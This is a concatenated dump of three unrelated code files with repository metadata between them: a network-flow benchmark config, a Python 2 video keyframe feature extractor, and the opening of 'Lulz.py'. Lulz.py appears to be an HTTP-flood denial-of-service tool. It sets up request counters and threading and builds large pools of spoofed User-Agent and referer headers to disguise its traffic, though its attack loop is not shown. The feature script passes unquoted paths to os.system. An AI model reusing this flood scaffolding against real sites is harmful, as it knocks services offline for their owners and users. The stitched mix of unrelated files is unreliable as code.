PATH_FORM_HYPERPARAMS = (4, True, "inv-cap")

# Per-topology NCFlow settings:
# (num_paths, edge_disjoint, dist_metric, partitioner class, partition factor).
NCFLOW_HYPERPARAMS = {
    "GtsCe.graphml": (4, True, "inv-cap", FMPartitioning, 3),
    "UsCarrier.graphml": (4, True, "inv-cap", FMPartitioning, 3),
    "Cogentco.graphml": (4, True, "inv-cap", FMPartitioning, 3),
    "Colt.graphml": (4, True, "inv-cap", FMPartitioning, 3),
    "TataNld.graphml": (4, True, "inv-cap", FMPartitioning, 3),
    "Deltacom.graphml": (4, True, "inv-cap", FMPartitioning, 3),
    "DialtelecomCz.graphml": (4, True, "inv-cap", FMPartitioning, 3),
    "Uninett2010.graphml": (4, True, "inv-cap", FMPartitioning, 3),
    "Interoute.graphml": (4, True, "inv-cap", SpectralClustering, 2),
    "Ion.graphml": (4, True, "inv-cap", FMPartitioning, 3),
    "Kdl.graphml": (4, True, "inv-cap", FMPartitioning, 3),
    "erdos-renyi-1260231677.json": (4, True, "inv-cap", FMPartitioning, 3),
}

PROBLEM_NAMES_AND_TM_MODELS = [
    (prob_name, tm_model) for prob_name in PROBLEM_NAMES for tm_model in TM_MODELS
]

# PROBLEMS: flat list of (problem_name, topo_fname, tm_fname).
# GROUPED_BY_PROBLEMS: (problem_name, model, scale_factor) -> sorted list of
# (topo_fname, tm_fname) pairs. HOLDOUT_* mirror these for the holdout TM set.
PROBLEMS = []
GROUPED_BY_PROBLEMS = defaultdict(list)
HOLDOUT_PROBLEMS = []
GROUPED_BY_HOLDOUT_PROBLEMS = defaultdict(list)

for problem_name in PROBLEM_NAMES:
    # Topology-Zoo topologies are .graphml; anything else lives directly
    # under ../topologies.
    if problem_name.endswith(".graphml"):
        topo_fname = os.path.join("..", "topologies", "topology-zoo", problem_name)
    else:
        topo_fname = os.path.join("..", "topologies", problem_name)
    for model in TM_MODELS:
        for tm_fname in iglob(
            "../traffic-matrices/{}/{}*_traffic-matrix.pkl".format(model, problem_name)
        ):
            # TM filenames: <problem>_<model>_<seed>_<scale>_traffic-matrix.pkl
            vals = os.path.basename(tm_fname)[:-4].split("_")
            _, traffic_seed, scale_factor = vals[1], int(vals[2]), float(vals[3])
            GROUPED_BY_PROBLEMS[(problem_name, model, scale_factor)].append(
                (topo_fname, tm_fname)
            )
            PROBLEMS.append((problem_name, topo_fname, tm_fname))
        for tm_fname in iglob(
            "../traffic-matrices/holdout/{}/{}*_traffic-matrix.pkl".format(
                model, problem_name
            )
        ):
            vals = os.path.basename(tm_fname)[:-4].split("_")
            _, traffic_seed, scale_factor = vals[1], int(vals[2]), float(vals[3])
            GROUPED_BY_HOLDOUT_PROBLEMS[(problem_name, model, scale_factor)].append(
                (topo_fname, tm_fname)
            )
            HOLDOUT_PROBLEMS.append((problem_name, topo_fname, tm_fname))

# Freeze to plain dicts and sort each group so slice indices are stable
# across runs.
GROUPED_BY_PROBLEMS = dict(GROUPED_BY_PROBLEMS)
for key, vals in GROUPED_BY_PROBLEMS.items():
    GROUPED_BY_PROBLEMS[key] = sorted(vals)

GROUPED_BY_HOLDOUT_PROBLEMS = dict(GROUPED_BY_HOLDOUT_PROBLEMS)
for key, vals in GROUPED_BY_HOLDOUT_PROBLEMS.items():
    GROUPED_BY_HOLDOUT_PROBLEMS[key] = sorted(vals)
def get_problems(args):
    """Select (problem_name, topo_fname, tm_fname) triples matching the CLI
    filters in *args* (topos, tm_models, scale_factors), one per requested
    slice index.
    """
    problems = []
    for (
        (problem_name, tm_model, scale_factor),
        topo_and_tm_fnames,
    ) in GROUPED_BY_PROBLEMS.items():
        # The filter does not depend on the slice, so evaluate it once per
        # group instead of once per slice (the original re-checked it in
        # the inner loop).
        if not (
            ("all" in args.topos or problem_name in args.topos)
            and ("all" in args.tm_models or tm_model in args.tm_models)
            and ("all" in args.scale_factors or scale_factor in args.scale_factors)
        ):
            continue
        # `slice_idx` avoids shadowing the builtin `slice`.
        for slice_idx in args.slices:
            topo_fname, tm_fname = topo_and_tm_fnames[slice_idx]
            problems.append((problem_name, topo_fname, tm_fname))
    return problems
def get_args_and_problems(output_csv_template, additional_args=[]):
    """Parse the shared benchmark CLI and return (args, output_csv, problems).

    :param output_csv_template: format string with two "{}" slots, filled
        with the objective name and a slice-list tag (e.g. "slice_0_1").
    :param additional_args: extra (name_or_flags, kwargs) pairs forwarded to
        argparse's add_argument.
        NOTE(review): mutable default argument; safe here because the list
        is only iterated, never mutated.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--dry-run", dest="dry_run", action="store_true", default=False)
    parser.add_argument("--obj", type=str, choices=["total_flow", "mcf"], required=True)
    parser.add_argument(
        "--tm-models", type=str, choices=TM_MODELS + ["all"], nargs="+", default="all",
    )
    parser.add_argument(
        "--topos", type=str, choices=PROBLEM_NAMES + ["all"], nargs="+", default="all",
    )
    parser.add_argument(
        "--scale-factors",
        # "all" passes through unchanged; anything else must parse as a float.
        type=lambda x: x if x == "all" else float(x),
        choices=SCALE_FACTORS + ["all"],
        nargs="+",
        default="all",
    )
    parser.add_argument(
        "--slices", type=int, choices=range(5), nargs="+", required=True
    )
    for additional_arg in additional_args:
        name_or_flags, kwargs = additional_arg[0], additional_arg[1]
        parser.add_argument(name_or_flags, **kwargs)
    args = parser.parse_args()
    # e.g. slices [0, 2] -> "slice_0_2", used to tag the output CSV name.
    slice_str = "slice_" + "_".join(str(i) for i in args.slices)
    output_csv = output_csv_template.format(args.obj, slice_str)
    return args, output_csv, get_problems(args)
def print_(*args, file=None):
    """print() that defaults to stdout and flushes the stream immediately,
    so benchmark progress is visible even through buffered pipes."""
    target = sys.stdout if file is None else file
    print(*args, file=target)
    target.flush()
| 1.296875 | 1 |
result_generator/result_feature_db/index_sift_color.py | shijack/feature_extract | 1 | 12797456 | # coding=utf-8
import os
import shutil
import time
def get_dirs_child(path):
    """Return the full paths of the immediate children of *path*
    (files and directories alike, in os.listdir order)."""
    children = os.listdir(path)
    return [os.path.join(path, child) for child in children]
def get_all_files_suffix(path, file_suffix='.jpg'):
    """Recursively collect files under *path* whose names end with
    *file_suffix* (default '.jpg'), in os.walk order."""
    matches = []
    for dirpath, _dirnames, filenames in os.walk(path):
        matches.extend(
            os.path.join(dirpath, filename)
            for filename in filenames
            if filename.endswith(file_suffix)
        )
    return matches
def copyFiles(file_imgs, targetDir):
    """Copy the images listed in *file_imgs* into *targetDir* (Python 2).

    Each line of *file_imgs* is '<path> ...'; only the first token is used,
    after a hard-coded dataset-root substitution. *targetDir* is created
    when absent. Returns -1 (after printing an error) as soon as one source
    path is missing; otherwise copies every listed file.
    NOTE(review): targetDir is concatenated directly with the basename, so
    it must end with a path separator.
    """
    list_imgs = []
    with open(file_imgs, 'r') as f:
        list_imgs_tmp = f.readlines()
    for item_img in list_imgs_tmp:
        # Remap the old dataset mount point to the current one.
        list_imgs.append(
            item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs',
                                           '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip())
    if not os.path.exists(targetDir):
        os.makedirs(targetDir)
    for eachfile in list_imgs:
        if not os.path.exists(eachfile):
            print "src path not exist:" + eachfile
            print "error!! attation!"
            return -1
        shutil.copy(eachfile, targetDir + os.path.basename(eachfile))
        print eachfile + " copy succeeded!"
# Reference invocation of the external fingerprint tool (kept for documentation;
# `cmd` is never executed in this module).
cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash'
# NOTE(review): the line below is a bare string expression — it is evaluated
# and discarded at import time (a no-op); presumably meant to be assigned or
# removed.
'/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash'
def feature_generator_sift_color(dir_img):
    """For every child directory of *dir_img* (Python 2):

    1. DESTRUCTIVELY renames its .jpg frames to sequential 00001.jpg... names;
    2. runs the external videofpget_bow_hash tool to write <dir>.bow and
       <dir>.hash next to the directory;
    3. records the original frame names in <dir>_img_names.txt.
    """
    dir_child_list = get_dirs_child(dir_img)
    print "--------------------------------------------------"
    print " feature extraction starts"
    print "--------------------------------------------------"
    start_time = time.time()
    for i, img_path in enumerate(dir_child_list):
        names = []
        img_names = get_all_files_suffix(img_path)
        # Rename frames to a contiguous 00001.jpg.. sequence, remembering
        # the original names for the sidecar .txt file.
        for j, item_name in enumerate(img_names):
            names.append(item_name)
            newname = os.path.dirname(item_name) + '/%05d' % (j + 1)
            os.rename(item_name, newname + ".jpg")
        # Re-glob after renaming to get the new sequential names.
        img_names = get_all_files_suffix(img_path)
        print len(img_names)
        # Shell out to the fingerprint tool: frames 1..N -> .bow/.hash files
        # placed next to the frame directory.
        fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1 ' + str(len(
            img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname(
            img_path) + '/' + img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) + '/' + img_path.split('/')[
                      -1] + '.hash'
        os.system(fp_pick)
        with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file:
            name_file.writelines(names)
        print "extracting feature from image No. %d , %d dirs in total" % ((i + 1), len(dir_child_list))
    end_time = time.time()
    print ("final_feature extract time:", (end_time - start_time))
    print "--------------------------------------------------"
    print " feature extraction ends ..."
    print "--------------------------------------------------"
def feature_generator_query(target_dir):
    '''
    Collect the query video frames listed in ./test_2000.txt into *target_dir*
    and generate the online system's .bow / .hash / .txt query features for them.
    :param target_dir: destination directory; must end with /
    :return:
    '''
    copyFiles('./test_2000.txt', target_dir)
    # Feature extraction runs over the grandparent of target_dir, so it picks
    # up the directory the frames were just copied into.
    feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../')))
if __name__ == "__main__":
    # Hard-coded staging directory for the query keyframes
    # (must end with '/', see feature_generator_query).
    query_dir_imgs = '/opt/dongsl/tmp2/tmp/'
    feature_generator_query(query_dir_imgs)
| 1.984375 | 2 |
Lulz.py | kami4/Lulz.pl | 0 | 12797464 | <gh_stars>0
import urllib2
import sys
import threading
import random
import re
#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0
def inc_counter():
global request_counter
request_counter+=1
def set_flag(val):
global flag
flag=val
def set_safe():
global safe
safe=1
# generates a user agent array
def useragent_list():
    """Fill the global ``headers_useragents`` pool with User-Agent strings
    (desktop browsers, crawlers/bots, mobile and console clients).

    Fix vs. the original: whole sections were pasted in two or three times
    verbatim (the 12 desktop-browser agents three times, the crawler block
    twice, several mobile lines repeatedly), bloating the pool and
    over-weighting the repeated entries for any random pick made from it.
    Each agent now appears exactly once, in first-occurrence order, added
    with a single ``extend`` instead of hundreds of ``append`` calls.

    NOTE(review): a number of entries are fragments of one real UA split
    across lines in the original (e.g. 'Build/IML74K) AppleWebKit/...',
    'Windows CE; PPC; 240x320)', 'App3leWebKit/53.1 ...'); they are kept
    byte-for-byte rather than guessed at — confirm before relying on them.
    """
    global headers_useragents
    headers_useragents.extend([
        # -- desktop browsers --
        'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534',
        'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
        'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
        'Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)',
        'Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2',
        'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
        'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
        'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
        'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
        'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
        'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
        'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
        # -- crawlers / bots (A) --
        'agadine/1.x.x (+http://www.agada.de)',
        'Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)',
        'AgentName/0.1 libwww-perl/5.48',
        'AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search engine China)',
        'AideRSS/1.0 (aiderss.com)',
        'aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)',
        'aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)',
        'Akregator/1.2.9; librss/remnants',
        'Aladin/3.324',
        'Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2',
        'Aleksika Spider/1.0 (+http://www.aleksika.com/)',
        'AlertInfo 2.0 (Powered by Newsbrain)',
        'AlkalineBOT/1.3',
        'AlkalineBOT/1.4 (1.4.0326.0 RTM)',
        'Allesklar/0.1 libwww-perl/5.46',
        'Alligator 1.31 (www.nearsoftware.com)',
        'Allrati/1.1 (+)',
        'AltaVista Intranet V2.0 AVS EVAL <EMAIL>',
        'AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>',
        'AltaVista Intranet V2.0 evreka.com <EMAIL>',
        'AltaVista V2.0B <EMAIL>',
        'amaya/x.xx libwww/x.x.x',
        'AmfibiBOT',
        'Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)',
        'Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)',
        'amibot',
        'Amiga-AWeb/3.4.167SE',
        'AmigaVoyager/3.4.4 (MorphOS/PPC native)',
        'AmiTCP Miami (AmigaOS 2.04)',
        'Amoi 8512/R21.0 NF-Browser/3.3',
        'amzn_assoc',
        'AnnoMille spider 0.1 alpha - http://www.annomille.it',
        'annotate_google; http://ponderer.org/download/annotate_google.user.js',
        'Anonymized by ProxyOS: http://www.megaproxy.com',
        'Anonymizer/1.1',
        'AnswerBus (http://www.answerbus.com/)',
        'AnswerChase PROve x.0',
        'AnswerChase x.0',
        'ANTFresco/x.xx',
        'antibot-V1.1.5/i586-linux-2.2',
        'AnzwersCrawl/2.0 (<EMAIL>;Engine)',
        'Apexoo Spider 1.x',
        'Aplix HTTP/1.0.1',
        'Aplix_SANYO_browser/1.x (Japanese)',
        'Aplix_SEGASATURN_browser/1.x (Japanese)',
        'Aport',
        'appie 1.1 (www.walhello.com)',
        'Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102',
        'Apple-PubSub/65.1.1',
        'ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)',
        'ArachBot',
        'Arachnoidea (<EMAIL>)',
        'aranhabot',
        'ArchitextSpider',
        'archive.org_bot',
        'Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)',
        'Arikus_Spider',
        'Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)',
        'ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)',
        'Asahina-Antenna/1.x',
        'Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)',
        'ask.24x.info',
        'AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)',
        'asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail dot com)',
        'ASPSeek/1.2.5',
        'ASPseek/1.2.9d',
        'ASPSeek/1.2.x',
        'ASPSeek/1.2.xa',
        'ASPseek/1.2.xx',
        'ASPSeek/1.2.xxpre',
        'ASSORT/0.10',
        'asterias/2.0',
        'AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)',
        'Atomic_Email_Hunter/4.0',
        'Atomz/1.0',
        'atSpider/1.0',
        'Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)',
        'AU-MIC/2.0 MMP/2.0',
        'AUDIOVOX-SMT5600',
        'augurfind',
        'augurnfind V-1.x',
        'autoemailspider',
        'autohttp',
        'autowebdir 1.1 (www.autowebdir.com)',
        'AV Fetch 1.0',
        'Avant Browser (http://www.avantbrowser.com)',
        'AVSearch-1.0(<EMAIL>)',
        'AVSearch-2.0-fusionIdx-14-CompetitorWebSites',
        'AVSearch-3.0(AltaVista/AVC)',
        'AWeb',
        'axadine/ (Axadine Crawler; http://www.axada.de/; )',
        'AxmoRobot - Crawling your site for better indexing on www.axmo.com search engine.',
        'Azureus 2.x.x.x',
        'BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)',
        'BaboomBot/1.x.x (+http://www.baboom.us)',
        'BackStreet Browser 3.x',
        'BaiduImagespider+(+http://www.baidu.jp/search/s308.html)',
        'BaiDuSpider',
        'Baiduspider+(+http://help.baidu.jp/system/05.html)',
        'Baiduspider+(+http://www.baidu.com/search/spider.htm)',
        'Baiduspider+(+http://www.baidu.com/search/spider_jp.html)',
        'Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine - obeys robots.txt and robots meta tags ; http://balihoo.com/index.aspx; robot at balihoo dot com)',
        'BanBots/1.2 (<EMAIL>)',
        'Barca/2.0.xxxx',
        '(DreamPassport/3.0; isao/MyDiGiRabi)',
        '(Privoxy/1.0)',
        '*/Nutch-0.9-dev',
        '+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)',
        '-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de',
        '123spider-Bot (Version: 1.02) powered by www.123spider.de',
        '192.comAgent',
        '1st ZipCommander (Net) - http://www.zipcommander.com/',
        '2Bone_LinkChecker/1.0 libwww-perl/5.64',
        '4anything.com LinkChecker v2.0',
        '8484 Boston Project v 1.0',
        ':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )',
        'A-Online Search',
        'A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27',
        'A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24',
        'AbachoBOT',
        'AbachoBOT (Mozilla compatible)',
        'ABCdatos BotLink/5.xx.xxx#BBL',
        'Aberja Checkomat Aberja Hybridsuchmaschine (Germany)',
        'abot/0.1 (abot; http://www.abot.com; <EMAIL>)',
        'About/0.1libwww-perl/5.47',
        'Accelatech RSSCrawler/0.4',
        'accoona Accoona Search robot',
        'Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)',
        'Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)',
        'Ace Explorer',
        'Ack (http://www.ackerm.com/)',
        'AcoiRobot',
        'Acoon Robot v1.50.001',
        'Acoon Robot v1.52 (http://www.acoon.de)',
        'Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)',
        'Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)',
        'Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at isara dot org)',
        'ActiveBookmark 1.x',
        'Activeworlds',
        'ActiveWorlds/3.xx (xxx)',
        'Ad Muncher v4.xx.x',
        'Ad Muncher v4x Build xxxxx',
        'Adaxas Spider (http://www.adaxas.net/)',
        'Advanced Browser (http://www.avantbrowser.com)',
        'AESOP_com_SpiderMan',
        # -- Android / mobile (several entries are line fragments; see NOTE above) --
        'Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41',
        'Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30',
        'Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)',
        'App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
        'Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0',
        ' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)',
        'Chrome/18.0.1025.166 Safari/535.19',
        'Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0',
        ' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)',
        'Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)',
        'AppleWebKit/535.19 (KHTML, like Gecko)',
        'Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)',
        'Chrome/18.0.1025.166 Mobile Safari/535.19',
        'Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)',
        'AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30',
        'Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0',
        'Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus S Build/JRO03E)',
        'Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)',
        'Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)',
        'Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)',
        'Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)',
        # -- validators / tools --
        'CSSCheck/1.2.2',
        'Cynthia 1.0',
        'HTMLParser/1.6',
        'P3P Validator',
        'W3C_Validator/1.654',
        'W3C_Validator/1.606',
        'W3C_Validator/1.591',
        'W3C_Validator/1.575',
        'W3C_Validator/1.555',
        'W3C_Validator/1.432.2.5',
        'W3C_Validator/1.432.2.22',
        'W3C_Validator/1.432.2.19',
        'W3C_Validator/1.432.2.10',
        'W3C_Validator/1.305.2.12 libwww-perl/5.64',
        'WDG_Validator/1.6.2',
        'amaya/11.3.1 libwww/5.4.1',
        'amaya/11.2 libwww/5.4.0',
        'amaya/11.1 libwww/5.4.0',
        'amaya/10.1 libwww/5.4.0',
        'amaya/10 libwww/5.4.0',
        'amaya/9.55 libwww/5.4.0',
        'amaya/9.54 libwww/5.4.0',
        'amaya/9.52 libwww/5.4.0',
        'amaya/9.51 libwww/5.4.0',
        'amaya/8.8.5 libwww/5.4.0',
        'amaya/11.2 amaya/5.4.0',
        'amaya/11.1 amaya/5.4.0',
        'Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)',
        'Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)',
        'Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)',
        'DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)',
        'GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)',
        'GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)',
        'GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)',
        'iTunes/9.1.1',
        'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
        'iTunes/9.0.3',
        'iTunes/9.0.2 (Windows; N)',
        'itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)',
        # -- legacy mobile / PDA / consoles --
        'Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)',
        'Mozilla/3.0 (compatible; AvantGo 3.2)',
        ' Mozilla/5.0 (compatible; AvantGo 3.2;',
        'ProxiNet; Danger hiptop 1.0)',
        'DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)',
        'DoCoMo/2.0 SH901iC(c100;TB;W24H12)',
        'DoCoMo/1.0/N503is/c10',
        'KDDI-KC31 UP.Browser/6.2.0.5 (GUI)',
        'MMP/2.0',
        'UP.Browser/3.04-TS14 UP.Link/3.4.4',
        'Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1',
        'J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0',
        'Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0',
        'PDXGW/1.0',
        'ASTEL/1.0/J-0511.00/c10/smel',
        'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us)',
        'AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16',
        'Version/4.0 Mobile Safari/533.1',
        'Mozilla/1.22 (compatible; MSIE 5.01;',
        'PalmOS 3.0) EudoraWeb 2.1',
        'Mozilla/4.0 (compatible; MSIE 4.01;',
        'Windows CE; PPC; 240x320)',
        'Mozilla/2.0 (compatible; MSIE 3.02;',
        'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619',
        'Minimo/0.020',
        'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610',
        'Minimo/0.016',
        'OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO',
        'UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)',
        'Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b',
        'Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5',
        'Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2',
        'Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0',
        'Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0',
        'Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0',
        'Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0',
        'Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0',
        'Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750',
        'WM5 PIE',
        'Xiino/1.0.9E [en] (v. 4.1; 153x130; g4)',
        'Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)',
        'Opera/9.80 (Android 3.2.1; Linux; Opera',
        'Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)',
        'Mozilla/5.0 (X11; Linux x86_64)',
        'Mozilla/5.0 (Linux; Android 4.1.1;',
        'Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;',
        'Version/4.0 Safari/534.30',
        'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;',
        'VS840 4G Build/GRK39F)',
        'AppleWebKit/533.1 (KHTML, like Gecko)',
        # -- modern Chrome builds --
        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36',
        'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
        'Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
    ])
# generates a referer array
def referer_list():
    """Populate the global ``headers_referers`` list with search-engine
    referer URL prefixes (a keyword is appended to one of these when a
    request is built).

    The original implementation appended the same 18 URLs hundreds of
    times via copy-pasted ``append`` calls; the duplicates carried no
